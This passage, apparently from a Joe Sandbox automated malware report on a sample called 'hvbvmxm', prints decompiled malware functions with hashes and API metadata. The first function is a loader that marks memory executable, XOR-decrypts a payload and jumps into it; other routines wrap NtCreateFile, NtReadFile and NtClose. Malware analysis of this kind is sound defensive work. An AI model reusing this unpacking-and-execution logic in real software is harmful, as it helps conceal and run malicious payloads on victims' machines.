					if(_t39 == 0x3e && _t39 == 0x97 &&  *((char*)(_t43 - 0x72)) == 0xbd &&  *((char*)(_t43 - 0x71)) == 0xba) {
						break;
					}
					_t37 = _t37 + 1;
					if(_t37 < 0x4000) {
						continue;
					} else {
						_t41 =  *(_t43 - 0x44);
					}
					L7:
					 *(_t43 - 0x78) = 0;
					 *(_t43 - 0x7c) = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff, _t43 - 0x44, _t43 - 0x7c, 0x40, _t43 - 0x78); // executed
					 *(_t43 - 0x40) =  *(_t43 - 0x40) ^ 0x11a7a880;
					 *(_t43 - 0x3c) =  *(_t43 - 0x3c) ^ 0x11a7a880;
					 *(_t43 - 0x38) =  *(_t43 - 0x38) ^ 0x11a7a880;
					 *(_t43 - 0x34) =  *(_t43 - 0x34) ^ 0x11a7a880;
					 *(_t43 - 0x30) =  *(_t43 - 0x30) ^ 0x11a7a880;
					E004016B0(_t35, _t41, 0x2ca00, _t43 - 0x40);
					_t22 = _t41 + 0x21810; // 0x21810, executed
					 *_t22(); // executed
					return 0;
				}
				_t41 = _t37 + _t25;
				 *(_t43 - 0x44) = _t41;
				goto L7;
			}









                                                  0x004014e9
                                                  0x004014e9
                                                  0x004014e9
                                                  0x004014f0
                                                  0x004014f3
                                                  0x004014f9
                                                  0x004014ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00401512
                                                  0x00401519
                                                  0x00000000
                                                  0x0040151b
                                                  0x0040151b
                                                  0x0040151b
                                                  0x0040151e
                                                  0x0040152e
                                                  0x00401535
                                                  0x0040153c
                                                  0x0040153e
                                                  0x00401545
                                                  0x0040154c
                                                  0x00401553
                                                  0x0040155a
                                                  0x0040156b
                                                  0x00401573
                                                  0x00401579
                                                  0x00401585
                                                  0x00401585
                                                  0x00401586
                                                  0x00401589
                                                  0x00000000

                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: 9687d2587e9857bb39df220e0e3cf835e89e689ab03871ec4c15cd7860a66439
                                                  • Instruction ID: 2b90622f39393b0058c2aa15a19c005d267b5dc71508bad4b704c993792a708c
                                                  • Opcode Fuzzy Hash: 9687d2587e9857bb39df220e0e3cf835e89e689ab03871ec4c15cd7860a66439
                                                  • Instruction Fuzzy Hash: C7115471D146486EDF29CAF4DC41ADFBBB4EF40324F64022ED922A71E1D73619468B85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041DEA7 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 344 41dea7-41def8 call 41eb17 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E0041DEA7(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc64; // 0xc64
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                  0x0041deb6
                                                  0x0041debe
                                                  0x0041def4
                                                  0x0041def8

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000005,00000000,004187E3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187E3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                  • Instruction ID: caa4313a033a612cc3db5c025c9ef0f97435adee46135c765efab3485d53b6e5
                                                  • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                  • Instruction Fuzzy Hash: 64F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018208BA0997241D630F851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041DF52 Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 354 41df52-41dfa0 call 41eb17 NtReadFile
                                                  C-Code - Quality: 19%
                                                  			E0041DF52(void* __eax, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				intOrPtr* _t32;
				void* _t34;

				asm("sbb eax, 0x55b2e1f3");
				_t16 = _a4;
				_t4 = _t16 + 0xc6c; // 0xe72
				_t32 = _t4;
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t16, _t32,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t21 =  *((intOrPtr*)( *_t32))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __eax, _t34); // executed
				return _t21;
			}






                                                  0x0041df53
                                                  0x0041df5a
                                                  0x0041df66
                                                  0x0041df66
                                                  0x0041df6e
                                                  0x0041df9c
                                                  0x0041dfa0

                                                  APIs
                                                  • NtReadFile.NTDLL(004189A7,00413C7B,FFFFFFFF,00418491,00000206,?,004189A7,00000206,00418491,FFFFFFFF,00413C7B,004189A7,00000206,00000000), ref: 0041DF9C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 06f743e81d4c6f344aa10923ce3285c99be648eee4bc05ec812d257d534e59f4
                                                  • Instruction ID: 078f94cc8e3ca05c9ab6c20fa3f3a32812e3feebc94ed0dc4228923cd4752e54
                                                  • Opcode Fuzzy Hash: 06f743e81d4c6f344aa10923ce3285c99be648eee4bc05ec812d257d534e59f4
                                                  • Instruction Fuzzy Hash: FBF0F4B2200118ABCB14DF89DC84EEB77A9AF8C754F118208BE4D9B281D630EC11CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041DF57 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 357 41df57-41df6d 358 41df73-41dfa0 NtReadFile 357->358 359 41df6e call 41eb17 357->359 359->358
                                                  C-Code - Quality: 37%
                                                  			E0041DF57(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xc6c; // 0xe72
				_t27 = _t3;
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                  0x0041df66
                                                  0x0041df66
                                                  0x0041df6e
                                                  0x0041df9c
                                                  0x0041dfa0

                                                  APIs
                                                  • NtReadFile.NTDLL(004189A7,00413C7B,FFFFFFFF,00418491,00000206,?,004189A7,00000206,00418491,FFFFFFFF,00413C7B,004189A7,00000206,00000000), ref: 0041DF9C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                  • Instruction ID: 655cb4e4c396fce941b8546bf9d16efbca437de042abb1fe47c2fd903f90b2bb
                                                  • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                  • Instruction Fuzzy Hash: 76F0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041DFD2 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041DFD2(intOrPtr __ebx, void* __edx, void* __edi, intOrPtr _a4, void* _a8) {
				long _t11;

				 *((intOrPtr*)(__edx + __edi - 0xffffffffec8b5554)) = __ebx;
				_t8 = _a4;
				_t6 = _t8 + 0xc74; // 0xc79
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t8, _t6,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}




                                                  0x0041dfd3
                                                  0x0041dfda
                                                  0x0041dfe6
                                                  0x0041dfee
                                                  0x0041dffc
                                                  0x0041e000

                                                  APIs
                                                  • NtClose.NTDLL(00418985,00000206,?,00418985,00000005,FFFFFFFF), ref: 0041DFFC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: d19b84792e9f1990ceab20171babb533aaec6d64bca2ed1901bf09d319f22f62
                                                  • Instruction ID: 1825da56593b3af8d6400fd194690cf66959247995f7361e4e5bd31633b70e00
                                                  • Opcode Fuzzy Hash: d19b84792e9f1990ceab20171babb533aaec6d64bca2ed1901bf09d319f22f62
                                                  • Instruction Fuzzy Hash: DCE0C232204220AFD710EBA4DC89FD73B58EF88360F004599B94D5F642C630E900C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041DFD7 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041DFD7(intOrPtr _a4, void* _a8) {
				long _t8;

				_t3 = _a4 + 0xc74; // 0xc79
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t5, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                  0x0041dfe6
                                                  0x0041dfee
                                                  0x0041dffc
                                                  0x0041e000

                                                  APIs
                                                  • NtClose.NTDLL(00418985,00000206,?,00418985,00000005,FFFFFFFF), ref: 0041DFFC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                  • Instruction ID: d7652ac376bfee5cbf167f0e09bc99e97af7e0678d6cdc255ef65e079968a69b
                                                  • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                  • Instruction Fuzzy Hash: 78D01776204214ABD614EBA9DC89ED77BACDF48664F014155BA0D5B242D631FA008BE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                  • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                                                  • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                  • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                  • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                                                  • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                  • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                  • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                                                  • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                  • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                  • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                                                  • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                  • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                  • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                                                  • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                  • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                  • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                                                  • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                  • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                  • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                                                  • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                  • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                  • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                                                  • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                  • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                  • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                                                  • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                  • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                  • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                                                  • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                  • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                  • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                                                  • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                  • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                  • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                                                  • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                  • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                  • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                                  • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                  • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                  • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                                  • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                  • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                  • Instruction ID: dc216a90dba302d4eee3dbe0a699ba85f72e60d12f14376749cf7359fa4ac185
                                                  • Opcode Fuzzy Hash: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                  • Instruction Fuzzy Hash: 0C90027231114402E220619984047060445D7D1341F51C465A082455CD86D588A1B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                  • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                                  • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                  • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

